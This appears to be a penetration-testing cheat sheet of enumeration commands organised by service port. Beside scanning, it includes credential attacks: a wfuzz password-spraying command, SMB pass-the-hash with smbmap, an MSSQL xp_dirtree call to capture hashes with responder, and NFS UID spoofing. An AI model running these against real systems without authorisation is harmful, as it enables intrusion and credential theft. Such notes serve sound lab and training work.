Tools-Enumeration

 

Enumeration

 

Host Discovery

Portscanner – NMAP:
##To save some time first run a simple SYN-Scan (half-open) to find open ports. Afterwards do a thorough scan with -sV -sC on the identified open ports. Optional pass a list of open ports to parameter -p.
> nmap 10.10.10.10 -p- -T4 -oA allports
> nmap 10.10.10.10 -p22,80,445 -sC -sV  -T4 -oA fullscan
> nmap 10.10.10.10 -sU -oA udpscan

##Grab all ports off an -p- Nmap scan and send them to a file called ports
##Print them all in one line for better copy&paste to specify ports in thorough scan
> cat allports.nmap | grep ^[0-9] | awk -F/ ‘{print$1}’ | sort -u > ports
> for i in $(cat ports); do echo -n $i,;  done


Screenshot websites:

##For a quicker enumeration on large networks – Take a screenshot of every web server to quickly find the juicy stuff (LINK).
> cat hosts.txt | aquatone
> firefox aquatone_report.html

Enumerate Users over RCP:
## For Windows use impackets lookupsid.py (LINK)
>python3 lookupsid.py ‘username:password’@10.10.10.10
##Or use RCPClient
> rpcclient ‘username%password’ 10.10.10.10
##From here Tab for listing all commands
RPCClient> lookupnames administrator
##Lookup SIDS. Replace XXXX with an number >= 500 for administrative accounts or >= 1000 for normal user accounts
RPCClient> lookupsids S1-5*****-XXXX
## For Linux use enum4linux
## enum4linux is compatible for Windows aswell
> enum4linux -a 10.10.10.10

 

Services

21 – FTP

Use Find on FTP:
##The default ftp does not support the “find” command. Use LFTP instead.
> lftp user@host
> lftp find . | grep “config”

Display hidden directories & files with LFTP:
> vim /etc/lftp.conf
> set ftp:list-options -a

53 – DNS

DSN zone transfer:
> dig axfr @10.10.10.10 dns.zone

80, 443 – HTTP / HTTPS

Find Hidden Directories:
##Gobuster will start the search for subdirectories on the end of the value for -u. To find subdirectories with Gobuster on a given directory other than the root directory for example on /admin/(here) you have to pass -u http://10.10.10.10:8080/admin/
> gobuster -u http://10.10.10.10:8080/ -w wordlists.txt  [-s statuscodes]
##WFUZZ will start fuzzing the part of the directory where it finds “FUZZ” inside the value for -u. With the –hX parameter you can specify which responses should be ignored. For example –hh 123 ignores all responses with a length of 123 characters.
> wfuzz -u http://10.10.10.10:8080/admin/FUZZ -w /wordlists/list.txt [ –hc / hl / hw / hh]

Live-Login Dictionary attack (PW-Sparying):
##Use Burp to intercept one login attempt to get the content for the post-data (-d) and –hw to ignore failed logins
> wfuzz -c –hw 42 -w wordlist.txt -d ‘username=admin&password=FUZZ&submit=login’ http://10.10.10.10/login

Web server vulnerability scanner:
> nikto -host http://10.10.10.10:8080/

Specific WebApp-Scanners:
> wpscan –url http://10.10.10.10/wordpress-root-directory
> joomscan -u http://10.10.10.10/joomla

 

161 UDP – SNMP

Get Community String via dictionary:
##You can find a link to download Seclist on the “Helpful Links” section.
> onesixtyone -c /Seclist/Descovery/SNMP/common-snmp-community-strings.txt 10.10.10.10

Read out SNMP-Data:
##-c equals Community String which is most likely to be “public”. -v2c or -v1 is depending on the SNMP version. To read the output with snmp-mibs make sure to use “apt install snmp-mibs-downloader” comment out “mibs :” inside /etc/snmp/snmp.conf
> snmpwalk -c public -v2c  10.10.10.92

 

139 / 445 – SMB

List SMB-Shares and access a specific share:
> smbclient -L 10.10.10.10
> smbclient \\\\10.10.10.10\\share-name

Mount a SMB-share to any destination (e.g. /mnt):
##Make sure that destination is not already mounted – unmount first
## use empty password for mounting for null authentication
> umount /mnt
> mount -t cifs ‘//10.10.10.10/share name’  /mnt

 

Unauthenticated list all content off a SMB-Share:
##Use -d as localhost or the actual domain or leave empty – depending on error message
> smbmap -H 10.10.10.10 -u anonymous -d localhost

 

Connect to SMB-Share via pass-the.hash and list all content:
> smbmap -u username -p ‘NTLMHASH:NTLMHASH’ -H 10.10.10.10 -R

Print all privileges after mounting – execute inside mountpoint (inside /mnt for previous example):
> for i in $(ls); do echo $i; smbcacls -N ‘//10.10.10.10/share name’ $i; done

 

389 – LDAP

Pull information like Naming Context, Distinguished Names and Domain Components:
> nmap -p 389 –script ldap-rootdse -Pn 10.10.10.10
> nmap -p 389 –script ldap-search -Pn 10.10.10.10
> ldapsearch -x -h 10.10.10.10 -s base namingcontexts

With the information from above Nmap output use Ldapsearch:
> ldapsearch -x -h 10.10.10.10 -s base -b ‘dc=Nmap output,dc=Nmap output’
> ldapsearch -x -h 10.10.10.10 -s sub -b ‘dc=Nmap output,dc=Nmap output’
> ldapsearch -x -h 10.10.10.10 -b ‘dc=Nmap output,dc=Nmap output’

Pull data with authenticated user:
## Use Distinguished-Name with -D
> ldapsearch -x -h 10.10.10.10 -D “CN=User,OU=..,DC=..,DC=…” -W

 

1433 MS-SQL

Connect to MSSQL database via impackets mssqlclient.py (LINK):
> mssqlclient.py username@10.10.10.10  -windows-auth

Connect from MSSQL server over impackets mssqlclient.py shell to SMB-Share to capture hash (responder needs to be  listening):
> xp_dirtree “\\10.10.10.10\offensiveShare\”

 

2049 – NFS Network File System

##Make sure to apt install nfs-common
> showmount -e 10.10.10.10
##Try to use version 2 because it has no authentication. Client is responsible for authorization.  When receiving a “permission denied” the client must provide the permission.  So check the uid (ls -alh) and set the uid to one of your local users.
>mount -t nfs vers=2 10.10.10.10:/sharename /mnt/point
##Example: ls -alh gives a share with ls -alh uid = 1002. Create a new local user “useradd offensive”   and edit that users uid in /etc/passwd to offensive:x:1002:2004::/home/offensive:/bin/sh

 

3000 – Node.js

##Try to authenticate against Node.js using HTTP-Authentication
curl http://username:password@10.10.10.10:3000/login

##Try to authenticate against Node.js using HTTP-Authentication (might have to guess correct parameters)
curl -XPOST http://10.10.10.10:3000/login -d ‘user=admin&password=admin’
curl -XPOST http://10.10.10.10:3000/login -d ‘username=admin&password=admin’

##Decode token to get information – for example if it is an JWT token
##Using token inside Header (depending on token – JWT in this case)
curl http://10.10.10.10:3000/ -H ‘Authorization: Bearer insert_token_here’